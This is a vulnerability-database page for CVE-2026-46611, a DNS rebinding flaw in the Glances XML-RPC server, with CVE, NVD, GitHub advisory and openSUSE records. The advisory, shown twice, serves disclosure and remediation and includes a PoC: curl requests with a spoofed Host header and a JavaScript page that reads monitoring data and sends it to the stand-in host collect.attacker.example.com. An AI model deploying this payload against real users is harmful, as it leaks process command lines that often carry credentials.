Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-46611 (GCVE-0-2026-46611)
Vulnerability from cvelistv5 – Published: 2026-06-25 18:00 – Updated: 2026-06-26 02:14
VLAI
EPSS
Title
Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim's browser. This vulnerability is fixed in 4.5.5.
Severity
5.3 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-46611",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T02:14:18.408132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-26T02:14:42.354Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-346",
"description": "CWE-346: Origin Validation Error",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-350",
"description": "CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-25T18:00:47.735Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"source": {
"advisory": "GHSA-w856-8p3r-p338",
"discovery": "UNKNOWN"
},
"title": "Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-46611",
"datePublished": "2026-06-25T18:00:47.735Z",
"dateReserved": "2026-05-15T19:34:14.011Z",
"dateUpdated": "2026-06-26T02:14:42.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-46611",
"date": "2026-06-26",
"epss": "0.00156",
"percentile": "0.0519"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46611\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-26T02:14:18.408132Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-26T02:14:35.954Z\"}}], \"cna\": {\"title\": \"Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack\", \"source\": {\"advisory\": \"GHSA-w856-8p3r-p338\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.5\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-346\", \"description\": \"CWE-346: Origin Validation Error\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-350\", \"description\": \"CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-25T18:00:47.735Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-46611\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-26T02:14:42.354Z\", \"dateReserved\": \"2026-05-15T19:34:14.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-25T18:00:47.735Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-46611
Vulnerability from fkie_nvd - Published: 2026-06-25 19:16 - Updated: 2026-06-26 04:17
Severity
Summary
Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim's browser. This vulnerability is fixed in 4.5.5.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.5"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.5, the Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. An attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser. This vulnerability is fixed in 4.5.5."
}
],
"id": "CVE-2026-46611",
"lastModified": "2026-06-26T04:17:43.260",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-46611",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-26T02:14:18.408132Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-25T19:16:37.800",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-346"
},
{
"lang": "en",
"value": "CWE-350"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-W856-8P3R-P338
Vulnerability from github – Published: 2026-06-22 21:31 – Updated: 2026-06-22 21:31
VLAI
Summary
Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack
Details
Summary
The Glances XML-RPC server (glances -s, implemented in glances/server.py) does not validate the HTTP Host header, leaving it vulnerable to DNS rebinding attacks. CVE-2026-32632 (patched in 4.5.2) added TrustedHostMiddleware to the REST/WebUI server; the MCP server has had equivalent protection since 4.5.1. The XML-RPC server received neither fix and has no allowed-hosts configuration key. Combined with the unrestricted Access-Control-Allow-Origin: * header (see companion advisory for CVE-2026-33533 and its incomplete fix), an attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim's browser.
Details
Affected component: glances/server.py — GlancesXMLRPCHandler / GlancesXMLRPCServer
Direct URL (commit 04579778e733d705898a169e049dc84772c852da): - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py
Contrast — patched backends: - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_restful_api.py - https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_mcp.py
The GlancesXMLRPCHandler class inherits from Python's xmlrpc.server.SimpleXMLRPCRequestHandler and does not override parse_request() to inspect or validate the Host header.
Contrast this with the two other Glances server backends, both of which received host-validation hardening:
REST / WebUI server (glances/outputs/glances_restful_api.py) — patched in 4.5.2:
# glances_restful_api.py
if self.webui_allowed_hosts:
self._app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=self.webui_allowed_hosts,
)
MCP server (glances/outputs/glances_mcp.py) — protected since 4.5.1:
# glances_mcp.py
TransportSecuritySettings(
allowed_hosts=self.mcp_allowed_hosts,
...
)
XML-RPC server (glances/server.py) — no equivalent exists:
class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):
# No Host header check; any Host value is accepted
rpc_paths = ('/RPC2',)
...
There is no xmlrpc_allowed_hosts (or equivalent) configuration key in glances.conf, and the server ignores the Host header on every incoming request.
Confirmed on: x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).
Test results:
| Server type | Host header | HTTP status | Data returned |
|---|---|---|---|
| XML-RPC | attacker.example.com |
200 OK | Yes — VULNERABLE |
| XML-RPC | 127.0.0.1:61209 |
200 OK | Yes (baseline) |
| REST API | attacker.example.com |
400 Bad Request | No — patched |
PoC
Attack overview
DNS rebinding breaks the browser Same-Origin Policy by making attacker.example.com temporarily resolve to the target's IP address (e.g. 127.0.0.1). From that point the victim's browser treats the attacker's page as same-origin with http://attacker.example.com:61209/RPC2, forwarding the attacker-controlled Host header to the local Glances XML-RPC server, which accepts it without validation.
Special configuration required
No special glances.conf settings are needed. The vulnerability is present in a default Glances XML-RPC server start (glances -s). For the comparison test (Step 3) the REST server must also be started; that step requires Glances to be installed with web dependencies (pip install "glances[web]").
Step 1 — Start the Glances XML-RPC server
glances -s -p 61209
Step 2 — Confirm the server accepts an arbitrary Host header
curl -s -D - -X POST "http://127.0.0.1:61209/RPC2" \
-H "Host: attacker.example.com" \
-H "Content-Type: text/plain" \
-d '<?xml version="1.0"?>
<methodCall><methodName>getAllPlugins</methodName></methodCall>'
Expected result (secure): HTTP/1.0 400 Bad Request
Actual result: HTTP/1.0 200 OK with full XML-RPC response body.
Step 3 — Confirm the REST API is patched (comparison)
# Start REST server with the same machine as allowed host:
glances -w -p 61210 --webui-port 61210
curl -s -o /dev/null -w "%{http_code}\n" \
"http://127.0.0.1:61210/api/4/status" \
-H "Host: attacker.example.com"
# Returns: 400 (TrustedHostMiddleware rejects the spoofed Host)
Step 4 — Full DNS rebinding exploitation (real-world path)
- Attacker registers
attacker.example.comwith a low-TTL (1 second) DNS record initially pointing to their own server IP. - Attacker serves the following page from
http://attacker.example.com:
<script>
async function exfil() {
const payload = `<?xml version="1.0"?>
<methodCall><methodName>getAll</methodName></methodCall>`;
try {
const r = await fetch('http://attacker.example.com:61209/RPC2', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: payload,
});
const data = await r.text();
// data contains: hostname, OS, all processes with cmd-lines, network, disk
await fetch('https://collect.attacker.example.com/?d=' + btoa(data));
} catch (_) {}
}
// Wait for TTL to expire and DNS to rebind to 127.0.0.1, then call exfil()
setTimeout(exfil, 5000);
</script>
- Victim visits
http://attacker.example.comin their browser. - After TTL expiry, the attacker's DNS server responds with
127.0.0.1. - The browser's
fetch()call is sent to127.0.0.1:61209withHost: attacker.example.com; the XML-RPC server accepts it. - The
Access-Control-Allow-Origin: *header (see companion advisory) allows the browser to read the response body. - The attacker receives the complete system monitoring snapshot.
Tools that simplify DNS rebinding for research/testing include: - Singularity - rbndr.us
Step 5 — Confirm absence of Host check in source
import sys, inspect
sys.path.insert(0, '/path/to/glances') # adjust to local clone
import glances.server as s
src = inspect.getsource(s.GlancesXMLRPCHandler)
print('Host check present:', 'allowed_hosts' in src or 'Host' in src)
# Host check present: False
Impact
Vulnerability type: Insufficient Verification of Data Authenticity / DNS Rebinding (CWE-350)
Who is impacted: Any user whose browser can reach a Glances XML-RPC server and who can be lured to visit an attacker controlled web page. This includes deployments where:
- Glances is bound to
127.0.0.1(loopback) — DNS rebinding bypasses the loopback restriction. - Glances is bound to a LAN IP — any browser on that LAN is at risk.
- Glances is exposed on a public IP — any browser on the internet is at risk.
Data exposed through the XML-RPC API includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, database passwords, and access tokens passed as environment variables or CLI flags), CPU/memory/disk/network statistics, open file descriptors, listening ports, and Docker/Kubernetes container metadata.
Impact: - Confidentiality: High — complete system monitoring data readable remotely without credentials. - Integrity: None — read-only XML-RPC API. - Availability: None — no denial-of-service component.
The attack is amplified by the companion CORS wildcard issue (vuln03): without Access-Control-Allow-Origin: *, the browser would still block the response read. Both issues must be fixed together for effective remediation.
Suggested Fix
Option 1 — Add Host validation to the XML-RPC handler (preferred)
Add a webui_allowed_hosts (or new xmlrpc_allowed_hosts) configuration key, and validate the Host header in GlancesXMLRPCHandler:
# server.py
class GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):
allowed_hosts: list[str] = [] # populated from config
def parse_request(self) -> bool:
if not super().parse_request():
return False
if self.allowed_hosts:
host = self.headers.get('Host', '').split(':')[0]
if host not in self.allowed_hosts:
self.send_error(400, 'Bad Request: invalid Host header')
return False
return True
Populate allowed_hosts from the existing webui_allowed_hosts config key (already used by the REST server), so operators have a single knob.
Option 2 — Deprecate and remove the XML-RPC server
The XML-RPC server is a legacy interface. The REST API (glances -w) provides a superset of functionality, is actively maintained, and has all current security controls. Deprecating the XML-RPC server in the next major release and directing users to the REST API would eliminate this attack surface entirely.
Responsible Disclosure
The AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first.
Credits
This issue was identified by Michał Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.
Severity
5.3 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46611"
],
"database_specific": {
"cwe_ids": [
"CWE-346",
"CWE-350"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T21:31:44Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe Glances XML-RPC server (`glances -s`, implemented in `glances/server.py`) does not validate the HTTP `Host` header, leaving it vulnerable to DNS rebinding attacks. CVE-2026-32632 (patched in 4.5.2) added `TrustedHostMiddleware` to the REST/WebUI server; the MCP server has had equivalent protection since 4.5.1. The XML-RPC server received neither fix and has no `allowed-hosts` configuration key. Combined with the unrestricted `Access-Control-Allow-Origin: *` header (see companion advisory for CVE-2026-33533 and its incomplete fix), an attacker can exploit DNS rebinding to exfiltrate the full system monitoring dataset from a victim\u0027s browser.\n\n---\n\n### Details\n\n**Affected component:** `glances/server.py` \u2014 `GlancesXMLRPCHandler` / `GlancesXMLRPCServer`\n\n**Direct URL (commit 04579778e733d705898a169e049dc84772c852da):**\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/server.py\n\nContrast \u2014 patched backends:\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_restful_api.py\n- https://github.com/nicolargo/glances/blob/04579778e733d705898a169e049dc84772c852da/glances/outputs/glances_mcp.py\n\nThe `GlancesXMLRPCHandler` class inherits from Python\u0027s `xmlrpc.server.SimpleXMLRPCRequestHandler` and does not override `parse_request()` to inspect or validate the `Host` header.\n\nContrast this with the two other Glances server backends, both of which received host-validation hardening:\n\n**REST / WebUI server** (`glances/outputs/glances_restful_api.py`) \u2014 patched in 4.5.2:\n\n```python\n# glances_restful_api.py\nif self.webui_allowed_hosts:\n self._app.add_middleware(\n TrustedHostMiddleware,\n allowed_hosts=self.webui_allowed_hosts,\n )\n```\n\n**MCP server** (`glances/outputs/glances_mcp.py`) \u2014 protected since 4.5.1:\n\n```python\n# glances_mcp.py\nTransportSecuritySettings(\n allowed_hosts=self.mcp_allowed_hosts,\n ...\n)\n```\n\n**XML-RPC server** (`glances/server.py`) \u2014 no equivalent exists:\n\n```python\nclass GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):\n # No Host header check; any Host value is accepted\n rpc_paths = (\u0027/RPC2\u0027,)\n ...\n```\n\nThere is no `xmlrpc_allowed_hosts` (or equivalent) configuration key in `glances.conf`, and the server ignores the `Host` header on every incoming request.\n\n**Confirmed on:** x86_64 Linux, Python 3.13, Glances 4.5.5_dev1 (commit 04579778e733d705898a169e049dc84772c852da).\n\nTest results:\n\n| Server type | Host header | HTTP status | Data returned |\n|-------------|----------------------|-------------|---------------|\n| XML-RPC | `attacker.example.com` | 200 OK | Yes \u2014 VULNERABLE |\n| XML-RPC | `127.0.0.1:61209` | 200 OK | Yes (baseline) |\n| REST API | `attacker.example.com` | 400 Bad Request | No \u2014 patched |\n\n---\n\n### PoC\n\n**Attack overview**\n\nDNS rebinding breaks the browser Same-Origin Policy by making `attacker.example.com` temporarily resolve to the target\u0027s IP address (e.g. `127.0.0.1`). From that point the victim\u0027s browser treats the attacker\u0027s page as same-origin with `http://attacker.example.com:61209/RPC2`, forwarding the attacker-controlled `Host` header to the local Glances XML-RPC server, which accepts it without validation.\n\n**Special configuration required**\n\nNo special `glances.conf` settings are needed. The vulnerability is present in a default Glances XML-RPC server start (`glances -s`). For the comparison test (Step 3) the REST server must also be started; that step requires Glances to be installed with web dependencies (`pip install \"glances[web]\"`).\n\n---\n\n**Step 1 \u2014 Start the Glances XML-RPC server**\n\n```bash\nglances -s -p 61209\n```\n\n**Step 2 \u2014 Confirm the server accepts an arbitrary Host header**\n\n```bash\ncurl -s -D - -X POST \"http://127.0.0.1:61209/RPC2\" \\\n -H \"Host: attacker.example.com\" \\\n -H \"Content-Type: text/plain\" \\\n -d \u0027\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAllPlugins\u003c/methodName\u003e\u003c/methodCall\u003e\u0027\n```\n\nExpected result (secure): `HTTP/1.0 400 Bad Request`\nActual result: `HTTP/1.0 200 OK` with full XML-RPC response body.\n\n**Step 3 \u2014 Confirm the REST API is patched (comparison)**\n\n```bash\n# Start REST server with the same machine as allowed host:\nglances -w -p 61210 --webui-port 61210\n\ncurl -s -o /dev/null -w \"%{http_code}\\n\" \\\n \"http://127.0.0.1:61210/api/4/status\" \\\n -H \"Host: attacker.example.com\"\n# Returns: 400 (TrustedHostMiddleware rejects the spoofed Host)\n```\n\n**Step 4 \u2014 Full DNS rebinding exploitation (real-world path)**\n\n1. Attacker registers `attacker.example.com` with a low-TTL (1 second) DNS record initially pointing to their own server IP.\n2. Attacker serves the following page from `http://attacker.example.com`:\n\n```html\n\u003cscript\u003e\nasync function exfil() {\n const payload = `\u003c?xml version=\"1.0\"?\u003e\n \u003cmethodCall\u003e\u003cmethodName\u003egetAll\u003c/methodName\u003e\u003c/methodCall\u003e`;\n try {\n const r = await fetch(\u0027http://attacker.example.com:61209/RPC2\u0027, {\n method: \u0027POST\u0027,\n headers: { \u0027Content-Type\u0027: \u0027text/plain\u0027 },\n body: payload,\n });\n const data = await r.text();\n // data contains: hostname, OS, all processes with cmd-lines, network, disk\n await fetch(\u0027https://collect.attacker.example.com/?d=\u0027 + btoa(data));\n } catch (_) {}\n}\n\n// Wait for TTL to expire and DNS to rebind to 127.0.0.1, then call exfil()\nsetTimeout(exfil, 5000);\n\u003c/script\u003e\n```\n\n3. Victim visits `http://attacker.example.com` in their browser.\n4. After TTL expiry, the attacker\u0027s DNS server responds with `127.0.0.1`.\n5. The browser\u0027s `fetch()` call is sent to `127.0.0.1:61209` with `Host: attacker.example.com`; the XML-RPC server accepts it.\n6. The `Access-Control-Allow-Origin: *` header (see companion advisory) allows the browser to read the response body.\n7. The attacker receives the complete system monitoring snapshot.\n\nTools that simplify DNS rebinding for research/testing include:\n- [Singularity](https://github.com/nccgroup/singularity)\n- [rbndr.us](https://rbndr.us)\n\n**Step 5 \u2014 Confirm absence of Host check in source**\n\n```python\nimport sys, inspect\nsys.path.insert(0, \u0027/path/to/glances\u0027) # adjust to local clone\nimport glances.server as s\n\nsrc = inspect.getsource(s.GlancesXMLRPCHandler)\nprint(\u0027Host check present:\u0027, \u0027allowed_hosts\u0027 in src or \u0027Host\u0027 in src)\n# Host check present: False\n```\n\n---\n\n### Impact\n\n**Vulnerability type:** Insufficient Verification of Data Authenticity / DNS Rebinding (CWE-350)\n\n**Who is impacted:** Any user whose browser can reach a Glances XML-RPC server and who can be lured to visit an attacker controlled web page. This includes deployments where:\n\n- Glances is bound to `127.0.0.1` (loopback) \u2014 DNS rebinding bypasses the loopback restriction.\n- Glances is bound to a LAN IP \u2014 any browser on that LAN is at risk.\n- Glances is exposed on a public IP \u2014 any browser on the internet is at risk.\n\n**Data exposed through the XML-RPC API** includes: hostname, OS and kernel version, full process list with command-line arguments (frequently containing API keys, database passwords, and access tokens passed as environment variables or CLI flags), CPU/memory/disk/network statistics, open file descriptors, listening ports, and Docker/Kubernetes container metadata.\n\n**Impact:**\n- **Confidentiality:** High \u2014 complete system monitoring data readable remotely without credentials.\n- **Integrity:** None \u2014 read-only XML-RPC API.\n- **Availability:** None \u2014 no denial-of-service component.\n\nThe attack is amplified by the companion CORS wildcard issue (vuln03): without `Access-Control-Allow-Origin: *`, the browser would still block the response read. Both issues must be fixed together for effective remediation.\n\n---\n\n### Suggested Fix\n\n**Option 1 \u2014 Add Host validation to the XML-RPC handler (preferred)**\n\nAdd a `webui_allowed_hosts` (or new `xmlrpc_allowed_hosts`) configuration key, and validate the `Host` header in `GlancesXMLRPCHandler`:\n\n```python\n# server.py\nclass GlancesXMLRPCHandler(SimpleXMLRPCRequestHandler, GlancesAPI):\n\n allowed_hosts: list[str] = [] # populated from config\n\n def parse_request(self) -\u003e bool:\n if not super().parse_request():\n return False\n if self.allowed_hosts:\n host = self.headers.get(\u0027Host\u0027, \u0027\u0027).split(\u0027:\u0027)[0]\n if host not in self.allowed_hosts:\n self.send_error(400, \u0027Bad Request: invalid Host header\u0027)\n return False\n return True\n```\n\nPopulate `allowed_hosts` from the existing `webui_allowed_hosts` config key (already used by the REST server), so operators have a single knob.\n\n**Option 2 \u2014 Deprecate and remove the XML-RPC server**\n\nThe XML-RPC server is a legacy interface. The REST API (`glances -w`) provides a superset of functionality, is actively maintained, and has all current security controls. Deprecating the XML-RPC server in the next major release and directing users to the REST API would eliminate this attack surface entirely.\n\n---\n\n### Responsible Disclosure\nThe AFINE Team is committed to responsible / coordinated disclosure. The AFINE Team will not publish details of this vulnerability or release exploit code publicly until a fix has been released, or 90 days have elapsed from the date of this report, whichever comes first. \n---\n\n### Credits\n\nThis issue was identified by Micha\u0142 Majchrowicz and Marcin Wyczechowski, members of the AFINE Team.\n\n---",
"id": "GHSA-w856-8p3r-p338",
"modified": "2026-06-22T21:31:44Z",
"published": "2026-06-22T21:31:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-w856-8p3r-p338"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances: XML-RPC Server Missing Host Header Validation Enables DNS Rebinding Attack"
}
OPENSUSE-SU-2026:11122-1
Vulnerability from csaf_opensuse - Published: 2026-06-25 00:00 - Updated: 2026-06-25 00:00Summary
glances-common-4.5.5-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.5-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.5-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-11122
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
16 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.5-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-Glances-4.5.5-1.1.s390x | — |
Vendor Fix
|
|
